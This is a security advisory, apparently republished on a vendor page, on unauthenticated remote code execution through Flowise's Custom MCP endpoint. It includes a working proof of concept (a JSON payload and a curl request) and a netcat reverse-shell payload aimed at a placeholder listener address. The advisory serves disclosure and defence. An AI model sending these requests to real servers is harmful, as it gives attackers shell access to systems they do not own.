GHSA-6933-jpx5-q87q
Flowise has unsandboxed remote code execution via Custom MCP
Blast Radius
Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.
flowisenpmDescription
Summary
The Custom MCPs feature is designed to execute OS commands, for instance, using tools like npx to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, the default installation of Flowise operates without authentication unless explicitly configured using the FLOWISE_USERNAME and FLOWISE_PASSWORD environment variables.
This combination presents a significant security risk, potentially allowing users on the platform to execute unsandboxed system commands. This can result in Remote Code Execution (RCE) and complete compromise of the running platform container or server.
PoC
-
Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as
npx,pnpm, etc): https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker -
Create a new file named
payload.jsonsomewhere in your machine, with the following data:
{"inputs":{"mcpServerConfig":{"command": "touch","args": ["/tmp/yofitofi"]}},"loadMethod":"listActions"}
- Send the following
curlrequest using thepayload.jsonfile created above with the following command:
curl -XPOST -H "x-request-from: internal" -H "Content-Type: application/json" --data @payload.json "http://localhost:3000/api/v1/node-load-method/customMCP"
- Observe that a new file named
yofitofiis created under/tmpfolder.
Similarily, we can use the same technique to gain a reverse shell using the built-in nc utility with the following JSON payload:
{"inputs":{"mcpServerConfig":{"command": "nc","args": [
"<LISTENER_IP_ADDRESS>","<LISTENER_PORT>","-e","/bin/sh"
]}},
"loadMethod":"listActions"}
Impact
Remote code execution
Mitigation
- Consider adding additional access controls surronding sensitive functionality such as Custom MCP, e.g. only users with "Admin" roles will be able to configure new Custom MCPs within the platform.
- Consider disabling the Custom MCP feature by default, with a clear disclaimer for end users on the implications of enabling this feature.
- Consider running Custom MCPs within a sandboxed environment
Credit
The vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | flowise | ≥ 2.2.7-patch.1&&< 3.0.6 | 3.0.6 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for flowise. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update flowise to 3.0.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-6933-jpx5-q87q is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-6933-jpx5-q87q is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-6933-jpx5-q87q. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-6933-jpx5-q87q in your dependencies?
O3 detects GHSA-6933-jpx5-q87q across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.